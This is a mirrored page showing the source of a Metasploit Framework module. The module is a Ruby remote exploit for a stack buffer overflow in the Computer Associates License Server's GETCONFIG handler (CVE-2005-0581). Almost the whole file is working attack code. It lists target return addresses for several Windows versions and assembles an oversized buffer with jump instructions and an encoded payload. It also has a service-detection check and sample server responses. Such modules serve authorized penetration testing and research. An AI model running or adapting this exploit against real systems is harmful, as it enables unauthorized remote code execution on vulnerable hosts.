CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/license/calicserv_getconfig.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name' => 'Computer Associates License Server GETCONFIG Overflow',

14
      'Description'	=> %q{

15
          This module exploits an vulnerability in the CA License Server

16
        network service. By sending an excessively long GETCONFIG

17
        packet the stack may be overwritten.

18
      },

19
      'Author' =>

20
        [

21
          'hdm', # original msf v2 module

22
          'aushack', # msf v3 port :)

23
        ],

24
      'License' => MSF_LICENSE,

25
      'References'	=>

26
        [

27
          [ 'CVE', '2005-0581' ],

28
          [ 'OSVDB', '14389' ],

29
          [ 'BID', '12705' ],

30
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],

31
        ],

32
      'Privileged' => true,

33
      'DefaultOptions' =>

34
        {

35
          'EXITFUNC' => 'process',

36
        },

37
      'Payload' =>

38
        {

39
          'Space'	=> 600,

40
          'BadChars' => "\x00\x20",

41
          'StackAdjustment' => -3500,

42


43
        },

44
      'Platform'	=> 'win',

45
      'Targets' =>

46
        [

47
          # As much as I would like to return back to the DLL or EXE,

48
          # all of those modules have a leading NULL in the

49
          # loaded @ address :(

50
          # name, jmp esi, writable, jmp edi

51
          #['Automatic', {} ],

52
          #

53
          # aushack - tested OK Windows XP English SP0-1 only 20100214

54
          ['Windows 2000 English',	{ 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi

55
          ['Windows XP English SP0-1',	{ 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi

56
          ['Windows XP English SP2',	{ 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi

57
          ['Windows 2003 English SP0',	{ 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi

58
        ],

59
      'DisclosureDate' => '2005-03-02'))

60


61
    register_options(

62
      [

63
        Opt::RPORT(10202),

64
      ])

65
  end

66


67
  def check

68
    connect

69
    banner = sock.get_once

70
    sock.put("A0 GETCONFIG SELF 0<EOM>")

71
    res = sock.get_once || ''

72
    disconnect

73
    if (res =~ /OS\<([^\>]+)/)

74
      vprint_status("CA License Server reports OS: #{$1}")

75
      return Exploit::CheckCode::Detected

76
    end

77
    return Exploit::CheckCode::Safe

78
  end

79


80
  def exploit

81
    connect

82
    banner = sock.get_once

83
    if (banner !~ /GETCONFIG/)

84
      print_status("The server did not return the expected greeting!")

85
    end

86


87
    # exploits two different versions at once >:-)

88
    # 144 -> return address of esi points to string middle

89
    # 196 -> return address of edi points to string beginning

90
    # 148 -> avoid exception by patching with writable address

91
    # 928 -> seh handler (not useful under XP SP2)

92
    buff = rand_text_alphanumeric(900)

93
    buff[142, 2] = Rex::Arch::X86.jmp_short(8) 		# jmp over addresses

94
    buff[144, 4] = [target['Rets'][0]].pack('V') 		# jmp esi

95
    buff[148, 4] = [target['Rets'][1]].pack('V')		# writable address

96
    buff[194, 2] = Rex::Arch::X86.jmp_short(4)		# jmp over address

97
    buff[196, 4] = [target['Rets'][2]].pack('V')		# jmp edi

98
    buff[272, payload.encoded.length] = payload.encoded

99


100
    sploit = "A0 GETCONFIG SELF #{buff}<EOM>"

101
    sock.put(sploit)

102


103
    handler

104
    disconnect

105
  end

106
end

107


108
=begin

109
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>

110
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>

111
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>

112
=end

113


114